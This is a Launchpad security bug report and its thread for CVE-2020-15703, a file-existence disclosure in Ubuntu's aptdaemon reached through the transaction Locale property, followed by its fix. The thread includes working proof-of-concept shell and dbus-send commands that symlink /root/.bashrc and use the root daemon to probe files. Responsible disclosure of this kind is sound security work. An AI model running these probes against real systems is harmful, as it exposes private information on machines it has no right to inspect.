Improper Input Validation vulnerability in Locale property of a transaction leading to Information Disclosure

Bug #1888235 reported by Vaisha Bernard on 2020-07-20
268
This bug affects 1 person
Affects Status Importance Assigned to Milestone
aptdaemon (Ubuntu)
Undecided
Unassigned

Bug Description

Hi,

There is no input validation on the Locale property in an apt transaction. An unprivileged user can supply a full path to a writable directory, which lets aptd read a file as root. Having a symlink in place results in an error message if the file exists, and no error otherwise. This way an unprivileged user can check for the existence of any files on the system as root.

This is a similar type of bug as CVE-2015-1323.

See the attached Python script for details.

$ ./test_file_exists.py /root/.bashrc
File Exists!
$ ./test_file_exists.py /root/.bashrca
File does not exist!

Description: Ubuntu 20.04 LTS
Release: 20.04

aptdaemon:
  Installed: 1.1.1+bzr982-0ubuntu32.1
  Candidate: 1.1.1+bzr982-0ubuntu32.1
  Version table:
 *** 1.1.1+bzr982-0ubuntu32.1 500
        500 http://nl.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
        500 http://nl.archive.ubuntu.com/ubuntu focal-updates/main i386 Packages
        100 /var/lib/dpkg/status
     1.1.1+bzr982-0ubuntu32 500
        500 http://nl.archive.ubuntu.com/ubuntu focal/main amd64 Packages
        500 http://nl.archive.ubuntu.com/ubuntu focal/main i386 Packages

Kind regards,
Vaisha Bernard
EYE Control B.V.

CVE References

Vaisha Bernard (vaisha) wrote :
Alex Murray (alexmurray) wrote :

Yes I can confirm this is an issue and is quite similar to CVE-2015-1323 - like in https://bugs.launchpad.net/ubuntu/+source/aptdaemon/+bug/1449587 a simple bash example via dbus-send is enough to demonstrate this:

$ mkdir -p /tmp/a/LC_MESSAGES
$ ln -s /root/.bashrc /tmp/a/LC_MESSAGES/aptdaemon.mo
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt org.debian.apt.InstallFile \
    string:/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb \
    boolean:false
method return time=1595299798.945425 sender=:1.194 -> destination=:1.193 serial=7 reply_serial=2
   string "/org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156"
$ dbus-send --print-reply --system --dest=org.debian.apt /org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156 org.freedesktop.DBus.Properties.Set string:org.debian.apt.transaction string:Locale string:/tmp/a.
Error org.freedesktop.DBus.Python.OSError: Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/policykit1.py", line 152, in get_uid_from_dbus_name
    return_value(uid)
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 462, in return_value
    raise _DefGen_Return(val)
defer._DefGen_Return: 1000

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
StopIteration

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 1226, in _set_property
    self._set_locale(value)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 835, in _set_locale
    self._translation = gettext.translation("aptdaemon",
  File "/usr/lib/python3.8/gettext.py", line 613, in translation
    t = _translations.setdefault(key, class_(fp))
  File "/usr/lib/python3.8/gettext.py", line 261, in __init__
    self._parse(fp)
  File "/usr/lib/python3.8/gettext.py", line 393, in _parse
    raise OSError(0, 'Bad magic number', filename)
OSError: [Errno 0] Bad magic number: '/tmp/a/LC_MESSAGES/aptdaemon.mo'

Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?

Seth Arnold (seth-arnold) wrote :

Nice find.

Please use CVE-2020-15703 for this issue.

Thanks

Vaisha Bernard (vaisha) wrote :

> Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?

Only here: https://bugs.launchpad.net/aptdaemon/+bug/1888232
Was unsure which of the two aptdaemon bugtrackers was the correct place to report this.

Alex Murray (alexmurray) wrote :

Ok I don't have access to that bug report so I can't see the activity there - I am assuming that perhaps there has been no response hence this bug report - would you be able to subscribe me to it?

Alex Murray (alexmurray) wrote :

FYI - I have duped https://bugs.launchpad.net/aptdaemon/+bug/1888232 against this bug to avoid any confusion (ie. this is the one-true-bug report for this issue).

Alex Murray (alexmurray) wrote :

Subscribing Julian for visibility.

Changed in aptdaemon (Ubuntu):
status: New → Triaged
Julian Andres Klode (juliank) wrote :

This should be easy to fix, a check for "/" in the locale name should suffice. Wondering whether Python should be fixed as well / instead though, such that locale._parselocale() does not consider ("/tmp/a.") a valid locale with language /tmp/a and region None.

Changed in aptdaemon (Ubuntu):
status: Triaged → In Progress
Julian Andres Klode (juliank) wrote :

Attached patch. Might need more changes, but this seems the right place. It makes it fail if the locale is a path with / in it. Not sure if we need to check other things.

I guess this applies to all releases.

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package aptdaemon - 1.1.1+bzr982-0ubuntu32.2

---------------
aptdaemon (1.1.1+bzr982-0ubuntu32.2) focal-security; urgency=medium

  * SECURITY UPDATE: information disclosure via locale (LP: #1888235)
    - debian/patches/CVE-2020-15703.patch: reject locales with full paths
      in aptdaemon/core.py.
    - CVE-2020-15703

 -- Marc Deslauriers <email address hidden> Wed, 23 Sep 2020 07:20:14 -0400

Changed in aptdaemon (Ubuntu):
status: In Progress → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package aptdaemon - 1.1.1+bzr982-0ubuntu19.4

---------------
aptdaemon (1.1.1+bzr982-0ubuntu19.4) bionic-security; urgency=medium

  * SECURITY UPDATE: information disclosure via locale (LP: #1888235)
    - debian/patches/CVE-2020-15703.patch: reject locales with full paths
      in aptdaemon/core.py.
    - CVE-2020-15703

 -- Marc Deslauriers <email address hidden> Wed, 23 Sep 2020 07:27:57 -0400

Changed in aptdaemon (Ubuntu):
status: In Progress → Fix Released
information type: Private Security → Public Security
Marc Deslauriers (mdeslaur) wrote :

The updates for this issue have been released:

https://ubuntu.com/security/notices/USN-4537-1

Thanks!

Ravikant (ravikantcool) wrote :

Ethereum

Changed in aptdaemon (Ubuntu):
assignee: nobody → Ravikant (ravikantcool)
Changed in aptdaemon (Ubuntu):
assignee: Ravikant (ravikantcool) → nobody
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Duplicates of this bug

Other bug subscribers